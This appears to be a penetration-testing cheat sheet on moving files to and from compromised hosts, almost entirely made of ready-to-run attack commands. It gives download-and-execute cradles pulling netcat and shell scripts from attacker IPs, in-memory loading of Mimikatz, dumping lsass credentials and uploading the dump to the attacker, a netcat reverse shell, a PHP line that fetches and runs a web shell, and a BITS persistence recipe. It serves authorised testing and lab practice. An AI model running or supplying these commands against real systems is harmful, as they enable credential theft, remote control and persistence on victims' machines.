> For the complete documentation index, see [llms.txt](https://gitbook.seguranca-informatica.pt/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/file-transfer.md).

# File Transfer

## **Basic commands**

```
python -m SimpleHTTPServer 80
php -S 0.0.0.0:80

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"	
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
```

### execute ps1 files

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1
```

### load it into the memory

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\")
```

### ninja1

```
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

### SMB

```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
net view \\10.10.14.17
copy \\10.10.14.17\a\nc.exe .
copy nc2.exe \\10.10.14.17\a\nc2.exe
```

### SMB with password + lsass dump

```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\10.201.69.16\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMPa.txt.dmp s:
```

### Execute nc via SMB (bypass defenses)

```
\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe
```

### netcat

```
ncat -lvp 80 > nc2.exe
nc -nv 10.10.14.17 < nc.exe -w 15
```

### copy files from target to kali

```
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsasss.dmp
```

### with PHP

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### HTTP-POST

```
http-post.py
./curl -F 'file=@firefox.exe_190824_231811.dmp' 10.10.15.213:8000/ -v
```

### /dev/tcp

```
cat xxx.zip > /dev/tcp/10.x.x.x.x/9001
nc -lvp 9001 > xxx.zip
```

### fetch (OpenBSD)

```
fetch  http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>
```

### rdesktop or remmina

```
rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>
```

## BITS

Download file into the C:\Windows folder.

```
> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.
```

Create persistence.

```
> bitsadmin /create persistence
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence
```

![](/files/-MYqkGCp7A_oVAXvDXIH)

{% embed url="<https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html>" %}

## ​[**updog**](https://github.com/sc0tfree/updog)

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.<br>

![](/files/-MYqoFkHp1TE8iZhV4gh)

or simply:

```
python -m SimpleHTTPServer 8080
```

or HTTPS with upload :sunglasses:&#x20;

{% embed url="<https://github.com/rhmoult/SecurityTools/blob/master/Platform_Independent/Python/httpsWithUpload/src/httpsWithUpload.py>" %}

## References

{% embed url="<https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/>" %}

{% embed url="<https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-download-a-file/>" %}

{% embed url="<https://blog.ropnop.com/transferring-files-from-kali-to-windows/>" %}
